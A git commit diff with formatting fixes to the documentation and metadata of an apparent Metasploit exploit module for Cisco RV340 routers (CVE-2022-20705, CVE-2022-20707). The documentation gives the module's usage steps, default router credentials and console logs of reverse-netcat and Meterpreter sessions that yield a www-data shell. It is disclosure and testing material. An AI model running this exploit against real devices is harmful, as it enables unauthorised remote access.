Minor fixes from review
This commit is contained in:
parent
4b05ba6189
commit
f2a86327d0
|
@ -9,14 +9,19 @@ Vulnerable up to, and tested against, firmware version 1.0.03.24. Version 1.0.03
|
||||||
|
|
||||||
### Installation
|
### Installation
|
||||||
|
|
||||||
Vulnerable software: https://software.cisco.com/download/home/286287791/type/282465789/release/1.0.03.24
|
Firmware version 1.0.03.24, which is vulnerable to CVE-2022-20705 and CVE-2022-20707, can be downloaded from
|
||||||
|
https://software.cisco.com/download/home/286287791/type/282465789/release/1.0.03.24
|
||||||
|
|
||||||
Log into the modem. Default IP address is 192.168.1.1 and default credentials
|
To install this firmware, follow the following directions:
|
||||||
are cisco for username and password. The `administration` option on the left
|
1. Log into the modem. The default IP address is 192.168.1.1 and the default credentials
|
||||||
side of the web page will take you to a form with a `Manual Upgrade` section.
|
are `cisco` for the username and password.
|
||||||
Leave `File Type: ` on default `Firmware Image` option. Change `Upgrade From:` option to `PC`. Press the `Upgrade` button.
|
2. The `administration` option on the left side of the web page will take you to a form
|
||||||
Press `Yes` on the message box asking `Are you sure you want to upgrade the firmware right now?`. Wait for router
|
with a `Manual Upgrade` section.
|
||||||
reboot to complete.
|
3. Leave `File Type: ` on the default `Firmware Image` option.
|
||||||
|
4. Change `Upgrade From:` option to `PC`.
|
||||||
|
5. Press the `Upgrade` button.
|
||||||
|
6. Press `Yes` on the message box asking `Are you sure you want to upgrade the firmware right now?`.
|
||||||
|
7. Wait for router reboot to complete.
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
|
@ -26,16 +31,14 @@ reboot to complete.
|
||||||
4. Do: `set lhost <listening ip>`
|
4. Do: `set lhost <listening ip>`
|
||||||
5. Do: `set rhost <target ip>`
|
5. Do: `set rhost <target ip>`
|
||||||
6. Do: `exploit`
|
6. Do: `exploit`
|
||||||
7. Verify: You see the message "Exploit successfully executed" confirming the exploit completed
|
7. Verify: You see the message `Exploit successfully executed` confirming the exploit completed
|
||||||
8. Verify: You are the "www-data" user using the `id` command
|
8. Verify: You are the `www-data` user using the `id` command
|
||||||
|
|
||||||
## Options
|
## Options
|
||||||
|
|
||||||
## Scenarios
|
## Scenarios
|
||||||
|
|
||||||
### Reverse Netcat Output
|
### Cisco RV340 Router 1.0.03.24 on ARM architecture - reverse_netcat payload
|
||||||
|
|
||||||
Cisco RV340 Router running 1.0.03.24 on ARM architecture
|
|
||||||
|
|
||||||
```
|
```
|
||||||
msf6 > use modules/exploits/linux/http/cisco_rv340_lan
|
msf6 > use modules/exploits/linux/http/cisco_rv340_lan
|
||||||
|
@ -55,11 +58,9 @@ msf6 exploit(linux/http/cisco_rv340_lan) > exploit
|
||||||
|
|
||||||
id
|
id
|
||||||
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||||
|
|
||||||
```
|
```
|
||||||
### Meterpreter Linux Dropper
|
|
||||||
|
|
||||||
Cisco RV340 Router running 1.0.03.24 on ARM architecture
|
### Cisco RV340 Router 1.0.03.24 on ARM architecture - reverse_tcp ARMLE Meterpreter payload
|
||||||
|
|
||||||
```
|
```
|
||||||
msf6 > use modules/exploits/linux/http/cisco_rv340_lan
|
msf6 > use modules/exploits/linux/http/cisco_rv340_lan
|
||||||
|
@ -90,5 +91,4 @@ Process 11012 created.
|
||||||
Channel 1 created.
|
Channel 1 created.
|
||||||
id
|
id
|
||||||
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
|
@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
versions 1.0.03.24 and below.
|
versions 1.0.03.24 and below.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Platform' => ['Linux', 'Unix'],
|
'Platform' => ['linux', 'unix'],
|
||||||
'Author' => [
|
'Author' => [
|
||||||
'Biem Pham', # Vulnerability Discoveries
|
'Biem Pham', # Vulnerability Discoveries
|
||||||
'Neterum', # Metasploit Module
|
'Neterum', # Metasploit Module
|
||||||
|
@ -33,10 +33,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'DisclosureDate' => '2021-11-02',
|
'DisclosureDate' => '2021-11-02',
|
||||||
'Arch' => [ARCH_CMD, ARCH_ARMLE],
|
'Arch' => [ARCH_CMD, ARCH_ARMLE],
|
||||||
'References' => [
|
'References' => [
|
||||||
[ 'CVE', '2022-20705'], # Authentication Bypass
|
['CVE', '2022-20705'], # Authentication Bypass
|
||||||
[ 'CVE', '2022-20707'], # Command Injection
|
['CVE', '2022-20707'], # Command Injection
|
||||||
[ 'ZDI', '22-410'], # Authentication Bypass
|
['ZDI', '22-410'], # Authentication Bypass
|
||||||
[ 'ZDI', '22-411'] # Command Injection
|
['ZDI', '22-411'] # Command Injection
|
||||||
],
|
],
|
||||||
'Targets' => [
|
'Targets' => [
|
||||||
[
|
[
|
||||||
|
|
Loading…
Reference in New Issue